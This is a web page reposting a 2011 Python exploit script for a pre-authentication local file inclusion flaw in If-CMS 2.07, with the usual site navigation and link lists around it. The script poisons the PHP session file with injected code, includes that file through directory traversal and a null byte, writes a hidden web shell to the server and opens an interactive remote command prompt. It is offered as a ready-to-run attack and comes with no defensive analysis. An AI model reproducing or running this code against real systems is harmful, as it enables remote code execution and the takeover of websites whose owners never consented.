首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
来源:vfocus.net 作者:TecR0c 发布时间:2011-03-16  

#!/usr/bin/python
# ~INFORMATION
# Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
# Author:  TecR0c
# Date:   13/3/2011
# Software link: http://bit.ly/hh9ZB4
# Tested on:  Linux bt
# Version:  2.07
# PHP.ini Settings: gpc_magic_quotes = Off

import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass
from optparse import OptionParser
from urlparse import urlparse,urljoin
from urllib import urlopen
from cookielib import CookieJar

__CONTACT__ ="TecR0c(tecr0c@tecninja.net)"
__DATE__ ="13.3.2011"

usage = 'Example : %s http://localhost/ncms/ -p 127.0.0.1:8080' % __file__
parser = OptionParser(usage=usage)
parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",
        help="HTTP Proxy <server>:<port>")

(options, args) = parser.parse_args()

if options.proxy:
        print '[+] Using Proxy'+options.proxy

# User Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
        "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
        "Google Chrome 0.2.149.29 (Windows XP)",
        "Opera 9.25 (Windows Vista)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
        "Opera/8.00 (Windows NT 5.1; U; en)"]
agent = random.choice(agents)

traversal = '../../../../../../../../../../../..'
sessionLocation = '/var/lib/php5/'

def banner():
    if os.name == "posix":
        os.system("clear")
    else:
        os.system("cls")
    header = '''
|----------------------------------------|
|Exploit: If-CMS 2.07 LFI RCE
|Author: %s
|Date: %s
|----------------------------------------|\n
'''%(__CONTACT__,__DATE__)
    for i in header:
        print "\b%s"%i,
        sys.stdout.flush()
        time.sleep(0.005)

def injectPayload():
 webSiteUrl = url.geturl()+'index.php?newlang=<?php;system(base64_decode($_REQUEST[cmd]));?>'
        try:
                opener.open(webSiteUrl)
        except:
                print '[-] Failed'

def proxyCheck():
        if options.proxy:
                try:
                        h2 = httplib.HTTPConnection(options.proxy)
                        h2.connect()
                        print "[+] Using Proxy Server:",options.proxy
                except(socket.timeout):
                        print "[-] Proxy Timed Out\n"
                        pass
                        sys.exit(1)
                except(NameError):
                        print "[-] Proxy Not Given\n"
                        pass
                        sys.exit(1)
                except:
                        print "[-] Proxy Failed\n"
                        pass
                        sys.exit(1)

def getProxy():
        try:
                proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
        except(socket.timeout):
                print "\n[-] Proxy Timed Out"
                sys.exit(1)
        return proxy_handler

cj = CookieJar()
if options.proxy:
        opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
else:
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('User-agent', agent)]

def postRequestWebShell(encodedCommand):
        webSiteUrl = url.geturl()+'.shell.php'
        commandToExecute = [
        ('cmd',encodedCommand)]
        cmdData = urllib.urlencode(commandToExecute)
        try:
                response = opener.open(webSiteUrl, cmdData).read()
        except:
                print '[-] Failed'
                sys.exit()
        return response

def writeOutShell(encodedCommand):
 cookieString = str(cj)
 cookieSearch = re.compile(r"PHPSESSID=(.*) f")
 session_value = cookieSearch.search(cookieString)
 if session_value:
  session_value = session_value.group(1)
 cj.clear()
 webSiteUrl = url.geturl()+'index.php?cmd='+encodedCommand+'&newlang='+traversal+sessionLocation+'sess_'+session_value+'%00'
 try:
                opener.open(webSiteUrl)
        except:
                print '[-] Failed'
                sys.exit()

def commandLine():
        encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php"
        encodedCommand = base64.b64encode(encodedCommand)
        writeOutShell(encodedCommand)
        commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)
        while True:
                try:
                        command = raw_input(commandLine)
                        encodedCommand = base64.b64encode(command)
                        response = postRequestWebShell(encodedCommand)
                        print response
                except KeyboardInterrupt:
                        encodedCommand = base64.b64encode('rm .shell.php')
                        postRequestWebShell(encodedCommand)
                        print "\n[!] Removed .shell.php\n"
                        sys.exit()

if "__main__" == __name__:
        banner()
        try:
                url=urlparse(args[0])
        except:
                parser.print_help()
                sys.exit()
        getProxy()
        proxyCheck()
 injectPayload()
 commandLine()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Opera 11.01 NULL PTR Derefernc
·Foxit PDF Reader 4.2 Javascrip
·HP OpenView Performance Insigh
·Adobe ColdFusion - Directory T
·ABBS Electronic Flash Cards 2.
·AVIPreview 0.26 Alpha Denial o
·ABBS Audio Media Player 3.0 .l
·Sun Java Applet2ClassLoader Re
·Android 2.0 ,2.1, 2.1.1 WebKit
·Nostromo 1.9.3 Directory Trave
·Linux <= 2.6.37-rc1 serial_cor
·Monkey's File Audio Buffer Ove
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved